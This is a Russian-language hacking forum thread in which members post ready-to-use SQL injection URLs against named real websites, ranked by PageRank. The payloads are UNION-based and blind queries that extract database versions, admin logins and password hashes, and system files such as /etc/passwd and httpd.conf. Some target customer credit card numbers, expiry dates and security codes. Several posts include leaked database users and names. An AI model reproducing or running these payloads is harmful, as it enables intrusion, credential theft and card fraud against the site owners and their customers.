SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    oitbrasil.org.br
    PR 7
    http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4--
    http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+1,concat_ws(0x3a,user,host,password,file_priv),3,4+from+mysql.user+--+ (mysql юзверы)
    http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f6574632f706173737764),2,3,4+from+mysql.user (etc/passwd)
    http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f7573722f6c6f63616c2f617061636865322f6c6f67732f6572726f725f6c6f67),2,3,4+from+mysql.user (error_log)
    http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f6574632f6d792e636e66),2,3,4+from+mysql.user (etc/my.cnf)
    http://www.oitbrasil.org.br/ipec/imp/ler_clipping.php?id=-3014+union+select+load_file(0x2f7573722f6c6f63616c2f617061636865322f636f6e662f68747470642e636f6e66),2,3,4+from+mysql.user (httpd.conf)
     
    2 people like this.
  2. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Агенцтво брачное

    http://www.bride4you.by/anketa.php?anketa_id=2'+and+1=0+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--+
     
    1 person likes this.
  3. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    aciprensa.com
    PR - 7
    http://www.aciprensa.com/Cine/pelicula.php?id=-165+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8--
    5.0.84:aciprensa@localhost:aciprensa
    http://www.aciprensa.com/Cine/pelicula.php?id=-165+union+select+1,concat_ws(0x3a,usr_user,usr_password),3,4,5,6,7,8+from+usuario+limit+0,1-- (Пароли)

    multimagen.com
    PR 5
    http://www.multimagen.com/videos/cine.php?id=-127+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9--
    5.0.91-community:multimag_multi@localhost:multimag_multimagen
    http://www.multimagen.com/videos/cine.php?id=-127+union+select+1,2,concat_ws(0x3a,usuario,clave),4,5,6,7,8,9+from+sis_usuarios_administrador+limit+0,1-- (пароли)
     
  4. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    cinefantastico.com
    PR - 5
    http://www.karmafilms.es/ficha_cine.php?ID=-15+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18,19--
    5.0.51a-log:karmafilms@localhost:34381wp2009111
    http://www.karmafilms.es/ficha_cine.php?ID=-15+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user_login,user_pass),12,13,14,15,16,17,18,19+from+wp_users-- (пароли вордпресса)
     
  5. N@b$ter

    N@b$ter Elder - Старейшина

    Joined:
    6 Oct 2009
    Messages:
    293
    Likes Received:
    73
    Reputations:
    21
    http://www.spaghetticlubs.org/review.php?review_id=6211-999.9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11--
    5.0.91-community-log:spaghett_web@localhost:spaghett_bookclub

    PR 5

    http://www.avoarchive.com/display.php?id=1216-999.9+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8--
    [email protected]:5.0.91-log:ignhill_maradv

    PR 3
     
    #13445 N@b$ter, 9 Dec 2010
    Last edited by a moderator: 9 Dec 2010
  6. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    721
    Likes Received:
    104
    Reputations:
    58
    Freeware Files - Free Software Downloads

    Code:
    http://www.freewarefiles.com/screenshot.php?programid=-17839+UNION+SELECT+1,2,3,4,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
    Username: fwfiles4_freewar@localhost
    Version: 4.1.22-standard-log
    Database: fwfiles4_freeware

    Google PR: 5
     
  7. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://www.marketindia.com/show_item_details.asp?item_id=125+or+1=(select+top+1+quotename(cc_auth_code%2B':'%2Bcc_auth_date)+from+orders)+--+
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.brokensilence.biz/php.php?u=539+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,version(),43,44,45,46,47,48,49,50,51,52,53,54,55,56,57--+
     
    _________________________
    1 person likes this.
  9. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    rocketry.org
    PR 4
    http://www.rocketry.org/news/newsStory.php?newsID=-10+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11+--+
     
  10. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    ТиЦ 60 PR 3
    Я.Каталог: Билеты в театры, на концерты
     
    1 person likes this.
  11. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,558
    Likes Received:
    920
    Reputations:
    520
    Немного от меня.

    Code:
    http://magpol.ru/e107_plugins/nboard/doadd.php?id=1%20and%200%20union%20select%201,2,version%28%29,4
    5.0.26-log

    Code:
    http://www.baikonure.ru/e107_plugins/nboard/doadd.php?id=1%20and%200%20union%20select%201,2,version%28%29,4
    5.0.91-community

    Code:
    http://www.itsfclan.it/e107_plugins/nboard/doadd.php?id=1%20and%200%20union%20select%201,2,version%28%29,4
    Code:
    http://pub-tower.ru/e107_plugins/roll_mini/roll.php?cat=1%27%20and%200%20union%20select%201,2,concat_ws%20%28%22%27%22,user_loginname,user_password%29,4,5,6%20from%20e107_user%20limit%200,1--%20&card_id=109
    Code:
    http://sempervivum-liste.de/e107_plugins/roll_mini/roll.php?cat=1%27%20and%200%20union%20select%201,2,concat_ws%28%22%27%22,user_loginname,user_password%29,4,5,6%20from%20e107_user%20limit%200,1--%20&card_id=109
    Code:
    http://www.aacgc.com/SSGC/e107_plugins/aacgc_pnews/News.php?1.2%20and%200%20union%20select%201,concat_ws%280x3a,user_loginname,user_password%29,3%20from%20e107_user%20limit%200,1
     
    2 people like this.
  12. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.bakertillynepal.com/newslist.php?id=-4+union+select+1,concat_ws(0x3a,user_id,login_name,login_pwd,user_email),3,4,5,6,7,8,9,10,11,12+from+btn_user+--


    http://soku-au.com/newslist.php?id=-4+union+select+1,2,3,group_concat(0x0b,id,0x3a,username,0x3a,userpwd),5,6,7,8,9+from+admin+--
     
    #13452 Bb0y, 11 Dec 2010
    Last edited: 11 Dec 2010
  13. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://snow-country.jp/contents.php?id=-142+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+c_admin_user+--+

    http://fan.nikko-aizu.com/contents.php?id=-94+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+c_admin_user--
     
    1 person likes this.
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.super55.com/lab.php?id=1562+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,118,119,120,121,122,123,124,125,126+LIMIT+1,1--%20&lang=slov&word=%20%20neutrofily


    5.1.48-msl-usrs-sure1-log:super55_szotar:super55@localhost
     
    1 person likes this.
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    http://redbox.sg/products.php?cat_id=-61+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user--

    bdlik_bdlik@localhost:5.0.91-community:bdlik_redboxx
    S$7.00
     
    3 people like this.
  16. N@b$ter

    N@b$ter Elder - Старейшина

    Joined:
    6 Oct 2009
    Messages:
    293
    Likes Received:
    73
    Reputations:
    21
    http://www.the8unit.com.my/news.php?id=5-999.9+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9+from+user--
     
  17. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    MSSQL

    http://www.ifocus.us/default.asp?pageid=7&deptid=7+or+1=(select+db_name())--


    DB: aware_ifocus-consulting

    tables: Content, ContentStatus
     
    1 person likes this.
  18. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    http://proroad.net/produit.php?id=-6+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6--
    http://proroad.net/produit.php?id=-6+union+select+1,2,3,concat_ws(0x3a,user,pass),5,6+from+tbl_admin--
     
    2 people like this.
  19. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    66
    Likes Received:
    20
    Reputations:
    1
    Online Shop cc

    http://www.shakuhachi.net.au/product_detail.php?id=id=-99+/*!UnIoN+SeLeCt*/+1,2,3,cOnCaT%28cust_fname,0x3a,cust_lname,0x3a,cust_email,0x3a,cust_address,0x3a,cust_country,0x3a,cookie_code,0x3a,order_status,0x3a,order_date,0x3a,city,0x3a,state,0x3a,poscode,0x3a,phone,0x3a,mobile,0x3a,card_name,0x3a,card_number,0x3a,credit_exp,0x3a,card_security%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+m_order%20where%20credit_exp!=0 limit 213,812--
     
    1 person likes this.
  20. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    www.sgsits.ac.in PR-5

    Code:
    http://www.sgsits.ac.in/pages/facultdetail.php?fid=58%27+union+select+1,2,3,4,unhex%28hex%28concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%29%29,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
    Code:
    4.1.7:[email protected]:sgsits

    www.romislokus.com ТИЦ-130
    blind

    Code:
    http://www.romislokus.com/eng/radios.php?num=102+and+substring%28%28select+version%28%29%29,1,1%29=5
    Code:
    5.0.77-log:[email protected]:romislokus
     
    3 people like this.
Thread Status:
Not open for further replies.